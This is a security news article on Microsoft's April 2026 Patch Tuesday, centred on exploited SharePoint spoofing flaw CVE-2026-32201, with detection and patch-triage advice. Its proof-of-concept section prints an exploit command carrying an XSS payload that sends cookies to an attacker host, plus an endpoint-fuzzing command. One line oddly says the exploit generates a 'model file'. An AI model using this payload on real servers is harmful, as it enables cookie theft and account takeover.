Microsoft's April 2026 Patch Tuesday is one of the largest on record, closing out 165 vulnerabilities — the second-biggest monthly batch the company has ever shipped, trailing only the October 2025 release. The standout issue is CVE-2026-32201, a SharePoint Server spoofing flaw that attackers were already exploiting before a fix existed. CISA has added it to the Known Exploited Vulnerabilities catalog with a federal patch deadline of April 28, 2026, and Microsoft tagged a further 19 bugs as likely to be weaponized soon.
CVE-2026-32201: the actively exploited SharePoint zero-day
The most urgent item this cycle is CVE-2026-32201, a spoofing vulnerability in Microsoft Office SharePoint Server that Microsoft has confirmed was exploited in the wild ahead of patch availability. The vendor rated it "important" with a CVSS score of 6.5.
The root cause is improper input validation: an unauthenticated, remote attacker can spoof content over the network, which can lead to disclosure and tampering of sensitive data. As Microsoft's advisory puts it:
"Improper input validation in Microsoft Office SharePoint allows an unauthorized attacker to perform spoofing over a network."
The same one-line description appears in the NVD entry and the CVE.org record. That terse wording has led several researchers to suspect the flaw is being chained with other bugs to broaden the impact of an intrusion. The CVSS of 6.5 understates the practical danger here — moderate score, active exploitation. Who is behind the attacks, and what they are after, was not known at publication time.
Affected versions and exploitation vector
A public proof-of-concept (B1tBit/CVE-2026-32201-exploit) documents the affected builds and the attack vector:
- Affected: SharePoint Server 2016 Enterprise, SharePoint Server 2019, and SharePoint Server Subscription Edition prior to
16.0.19725.20210 - CVSS vector:
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N - Impact: viewing or modifying sensitive data through spoofed notifications and documents
The PoC abuses a crafted POST request that bypasses input validation via a sender_override parameter, allowing an attacker to forge the apparent sender of a SharePoint notification and inject arbitrary content — including an XSS payload aimed at cookie theft.
Proof of concept
The published exploit generates a malicious model file and dispatches a spoofed notification request. The reference invocation:
python3 exploit.py https://sharepoint.target.com \
--recipient victim@target.com \
--sender "admin@target.com" \
--message "<script>fetch('http://attacker.com/?c='+document.cookie)</script>" \
--endpoint /_layouts/15/notify.aspx
A successful run produces output similar to:
[+] SharePoint detected.
[*] Sending spoofed request to https://target.com/_layouts/15/notify.aspx
[+] Status: 200
[+] Potential success: Check target logs/email for spoofed content.
The author notes several extensions to the basic technique:
- Endpoint discovery by fuzzing layout paths:
ffuf -u https://target.com/FUZZ -w sharepoint-layouts.txt - XSS delivery by embedding JavaScript in the
--messagevalue to steal cookies - Chaining the spoof into a phishing link to pursue an authentication bypass
A 200 OK response containing sent/success is treated as an indicator the spoofed message was accepted.
CISA deadline and detection
CISA added CVE-2026-32201 to its Known Exploited Vulnerabilities (KEV) catalog and ordered federal civilian agencies to remediate by April 28, 2026. The catalog already listed 10 earlier SharePoint vulnerabilities before this addition. Everyone outside the federal mandate should treat that date as a hard target and prioritize any SharePoint Server reachable from the internet or holding sensitive internal data.
For detection, defenders should inspect server-side telemetry for anomalous requests against notify.aspx and other _layouts endpoints:
- Review SharePoint ULS logs and IIS logs for unusual
POSTtraffic to/_layouts/15/notify.aspx - Watch outbound email and document stores for forged senders and tampered content
- Test for unexpected data modification consistent with the spoofing vector
The PoC lists builds below 16.0.19725.20210 as affected, so upgrading past that version is the remediation path.
CVE-2026-33825 (BlueHammer) and 19 "exploitation more likely" bugs
Microsoft assigned its "exploitation more likely" label to 19 additional fixes this month — a signal from Microsoft's own analysts that these are realistic near-term targets.
The most concerning of the group is CVE-2026-33825, an elevation-of-privilege vulnerability in Microsoft Defender that was publicly disclosed before a patch shipped, sharply raising the exploitation risk. Researchers link it to the bug publicly nicknamed "BlueHammer," reportedly dropped by a disgruntled researcher outside any coordinated disclosure process.
The wider set of higher-risk flaws touches a broad swath of core Windows subsystems. Prioritize assessment across:
- Authentication & identity: Active Directory, Windows Hello
- Remote access: Remote Desktop Services
- Storage & file systems: Storage Space Controllers, Common Log File System Driver, BitLocker
- Networking: TCP/IP, TDI Translation Driver, UPnP Device Host
- System components: Boot Loader, Windows Search, Management Console, COM, Shell, Function Discovery Service, Desktop Window Manager
The spread alone argues for handling this cycle as a high-priority push rather than routine maintenance.
Scale and triage guidance
Satnam Narang, Senior Staff Research Engineer at Tenable, confirmed this is the second-largest Patch Tuesday by CVE count in Microsoft's history, just behind October 2025. With 165 fixes, patching fatigue is real, so structured triage matters: take the actively exploited bug first, then the "exploitation more likely" set, then work the remainder by exposure and severity using vendor CVSS scores and Microsoft's exploitability ratings.
Adobe ships in parallel
Alongside Microsoft, Adobe released its own April 2026 update addressing more than 50 vulnerabilities across 11 products. Shops running Adobe software next to Microsoft stacks should fold these into the same emergency patching window where feasible to compress overall remediation time.
Bottom line
Lead with SharePoint Server: apply the update, consult CISA's KEV catalog, and comb network and server logs for signs of CVE-2026-32201 exploitation. Then move on to the Defender BlueHammer fix (CVE-2026-33825) and the rest of the at-risk Windows component stack. With 165 CVEs in a single release and one already under active attack, the April 28 federal deadline is a sensible benchmark for every organization's own timeline.